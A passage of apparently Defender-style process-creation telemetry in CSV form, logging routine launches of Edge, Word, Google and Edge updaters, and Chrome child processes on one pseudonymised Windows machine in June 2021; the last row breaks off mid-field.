+883,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:41:00.388211700+00:00,9284,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6860 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:41:00.697451500+00:00,2021-06-24 01:42:12.413063500+00:00,56c47ecb-2b14-4d37-84db-14b0d5f891d2,computerpii_0a470890c60768167990033d701e7bd881398861,172360,False,10.7740.19041.1052,False,11540474045175158,,11540474045175796,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+884,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:30:22.797014700+00:00,7408,WINWORD.EXE,"""WINWORD.EXE"" /n ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\IV candidate\FilePII_15549f01286c4669d09ccbbfee61348491099d84.docx"" /o """"",PortableExecutable,2021-06-12 08:57:29.821251600+00:00,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,1966872,f3abb50ecc7e899f33f65d25e85b41a9,66cfbd07dc44da187833715ddc6e1fed4facb8b8bdaf580017f9921f1a257a60,67d3ada9611ac933b40df52acde629cf800d3bad,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:30:23.704774400+00:00,2021-06-24 06:32:38.582877100+00:00,54613ee7-4e55-40cc-8964-202192c20443,computerpii_0a470890c60768167990033d701e7bd881398861,176443,False,10.7740.19041.1052,False,11540474045175127,,11540474045176887,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,WinWord,WinWord.exe,Microsoft Word
+885,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:58:48.336801800+00:00,19840,GoogleUpdate.exe,"""GoogleUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:58:48.514501800+00:00,2021-06-24 11:01:03.752829800+00:00,1d7552e6-470f-4bbd-9176-24687fd6fc35,computerpii_0a470890c60768167990033d701e7bd881398861,178995,False,10.7740.19041.1052,False,11540474045136925,,11540474045177801,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+886,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:59:25.505222400+00:00,14644,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /ua /installsource core",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:59:24.072729+00:00,2464,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:25.612202+00:00,2021-06-24 11:01:03.764406500+00:00,f6f7d953-206b-43c1-a25b-269558e71891,computerpii_0a470890c60768167990033d701e7bd881398861,179292,False,10.7740.19041.1052,False,11540474045177818,,11540474045177837,2021-06-24 10:59:24.072729+00:00,2464,2021-06-24 10:59:24.072729+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,2464,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeUpdate,213392,2020-07-01 03:12:51+00:00,2020-09-27 14:36:12.710449400+00:00,2021-06-24 01:43:16.538459700+00:00,2020-09-27 14:36:21.069830800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+887,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:27.228432200+00:00,16208,backgroundTaskHost.exe,"""BackgroundTaskHost.exe"" -ServerName:BackgroundTaskHost.WebAccountProvider",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:27.514549200+00:00,2021-06-24 11:01:03.765390500+00:00,be15eafd-6394-4863-8387-47918d9754a5,computerpii_0a470890c60768167990033d701e7bd881398861,179322,False,10.7740.19041.1052,False,11540474045136908,,11540474045177848,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+888,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:24.408006+00:00,7276,explorer.exe,Explorer.EXE,False,2021-06-24 10:59:24.319380+00:00,8572,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:29.152168500+00:00,2021-06-24 11:01:03.766955100+00:00,3e82ba83-5206-46f0-909b-0bb1acb17889,computerpii_0a470890c60768167990033d701e7bd881398861,179369,False,10.7740.19041.1052,False,11540474045177826,,11540474045177854,2021-06-24 10:59:24.408006+00:00,7276,2021-06-24 10:59:24.408006+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,7276,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 10:59:24.411145200+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,1.0,3073.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+889,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.116572100+00:00,11912,chrome.exe,"""chrome.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Google\Chrome\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Google\Chrome\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Google\Chrome\User Data"" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=91.0.4472.114 --initial-client-data=0x110,0x114,0x118,0xf0,0x11c,0x7ffbf11f4370,0x7ffbf11f4380,0x7ffbf11f4390",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:29.155699700+00:00,2021-06-24 11:01:03.766988600+00:00,93b62805-59fc-4676-affd-59ffd866b59b,computerpii_0a470890c60768167990033d701e7bd881398861,179370,False,10.7740.19041.1052,False,11540474045177854,,11540474045177855,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,256.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+890,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.550061+00:00,19948,chrome.exe,"""chrome.exe"" --type=gpu-process --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:2",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.880333200+00:00,2021-06-24 11:01:03.768873400+00:00,6450bfc3-a888-45bc-a4b8-a002c261b627,computerpii_0a470890c60768167990033d701e7bd881398861,179430,False,10.7740.19041.1052,False,11540474045177854,,11540474045177857,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+891,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.558666800+00:00,20904,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.881829600+00:00,2021-06-24 11:01:03.768906400+00:00,a7dec08a-c680-4196-a946-6caa51311861,computerpii_0a470890c60768167990033d701e7bd881398861,179431,False,10.7740.19041.1052,False,11540474045177854,,11540474045177858,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,1.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+892,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.681656400+00:00,11624,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.890815900+00:00,2021-06-24 11:01:03.768939+00:00,a099bf0f-43ea-49d1-95ff-dbc9ac114c7c,computerpii_0a470890c60768167990033d701e7bd881398861,179432,False,10.7740.19041.1052,False,11540474045177854,,11540474045177859,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+893,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:29.824533300+00:00,18912,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 